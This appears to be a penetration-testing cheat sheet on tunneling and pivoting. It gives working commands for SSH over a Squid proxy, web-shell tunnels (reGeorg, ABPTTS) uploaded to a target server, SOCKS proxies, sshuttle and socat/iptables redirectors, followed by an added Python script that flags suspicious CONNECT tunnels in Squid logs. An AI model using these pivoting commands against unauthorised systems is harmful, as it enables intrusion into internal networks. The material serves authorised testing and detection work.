Tunneling and Port Forwarding


Last updated 4 years ago


SSH over HTTP (Squid)

socat

socat TCP-L:9999,fork,reuseaddr PROXY:ip:127.0.0.1:22,proxyport=3128

ssh user@127.0.0.1 -p 9999

proxytunnel

proxytunnel -p ip:3128 -d 127.0.0.1:22 -a 5555

ssh user@127.0.0.1 -p 5555

proxychains

Add the Squid proxy to proxychains.conf:
http ip 3128

proxychains ssh user@127.0.0.1

corkscrew

ssh user@ip -t /bin/sh
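An added defender-side example, not code from the page or from any tool listed above: every variant in this section relies on the Squid proxy honouring CONNECT to port 22, which Squid's stock config refuses (http_access deny CONNECT !SSL_ports, where SSL_ports is just 443). The script below parses constructed Squid native-format access.log lines (the sample lines and IPs are made up) and reports CONNECT requests to non-443 or internal destinations, separating tunnels that were actually established (2xx) from ones the proxy denied.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address

# Squid "native" access.log format (constructed sample, not taken from the page):
#   timestamp elapsed client action/status bytes method url ident hierarchy/peer type
SAMPLE_LOG = """\
1700000000.101    152 10.0.0.5 TCP_TUNNEL/200 4096 CONNECT 127.0.0.1:22 - HIER_DIRECT/127.0.0.1 -
1700000001.202     88 10.0.0.5 TCP_TUNNEL/200 15231 CONNECT www.example.com:443 - HIER_DIRECT/93.184.216.34 -
1700000002.303      3 10.0.0.7 TCP_DENIED/403 3921 CONNECT 10.10.10.20:3389 - HIER_NONE/- text/html
1700000003.404     40 10.0.0.9 TCP_MISS/200 2211 GET http://www.example.com/ - HIER_DIRECT/93.184.216.34 text/html
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<action>[A-Z_]+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)

# Ports a forward proxy legitimately tunnels; Squid's default SSL_ports ACL is only 443.
ALLOWED_CONNECT_PORTS = {443}


@dataclass
class TunnelFinding:
    client: str
    dest_host: str
    dest_port: int
    established: bool  # True when the proxy answered 2xx, i.e. the tunnel went through


def is_internal(host: str) -> bool:
    """Loopback or RFC 1918 destination: a CONNECT aimed at the proxy's own network."""
    try:
        addr = ip_address(host)
    except ValueError:  # hostname, not a literal IP
        return False
    return addr.is_loopback or addr.is_private


def find_connect_tunnels(log_text: str) -> list:
    """Return CONNECT requests that are not plain TLS browsing to an external host."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "CONNECT":
            continue
        host, _, port = m["url"].rpartition(":")
        port = int(port)
        if port in ALLOWED_CONNECT_PORTS and not is_internal(host):
            continue  # ordinary HTTPS through the proxy
        findings.append(TunnelFinding(m["client"], host, port, m["status"].startswith("2")))
    return findings
```

An established CONNECT to 127.0.0.1:22 in this output is exactly the socat/proxytunnel pattern above; a denied one still shows who tried.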

TCP over HTTP

For this technique, it is necessary to be able to upload a file to a webserver.

1. reGeorg

Upload the file to the server.

Tunnel creation:
python reGeorgSocksProxy.py -p 5555 -u "http://<ip>/admin/uploads/reGeorg.jsp"

Proxychains config: point proxychains.conf at the local SOCKS listener on port 5555.

proxychains nmap -F -sT 127.0.0.1

proxychains mysql -u root -p -h 127.0.0.1

proxychains ssh localhost

2. ABPTTS

Upload the file.

Configure proxychains and create the tunnel:
python abpttsclient.py -c tomcat_walkthrough/config.txt -u http://ip/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22

Usage:
ssh -p 22222 user@127.0.0.1

HTTP Redirectors

Windows Socks Proxy

Here it is used to reach Burp, which is listening on a NATed Windows VM, from other PCs on the same network as the Windows host.

From the Windows Host machine (IP: 192.168.1.206)

Import-Module .\Invoke-SocksProxy.psm1
Invoke-SocksProxy -bindPort 1234

From another PC on the Windows host's network (IP: 192.168.1.69)

Configure proxychains.conf:

socks4 ip 1234

proxychains socat TCP-LISTEN:8081,fork,reuseaddr TCP:ip:8080

The command above makes Burp (listening on the NATed machine) reachable at ip on port 8081.

Now, configure the Proxy in the browser:

All the traffic is logged on the NATed machine Burp.

Poor Man's VPN

Forward traffic over SSH without needing ssh -D <port>:

sshuttle -vr user@ip 1X0.1X.0.0/16

HTTP redirector commands (forward inbound port 80 to a remote host):

1. socat
socat TCP4-LISTEN:80,fork TCP4:REMOTE-HOST-IP-ADDRESS:80

2. iptables
iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination REMOTEADDR:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

Reference:

https://pentest.blog/explore-hidden-networks-with-double-pivoting/
https://sensepost.com/discover/tools/reGeorg/
https://github.com/nccgroup/ABPTTS
https://github.com/p3nt4/Invoke-SocksProxy
GitHub - adon90/pentest_compilation: Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios
PWK Notes: Tunneling and Pivoting [Updated] (0xdf hacks stuff)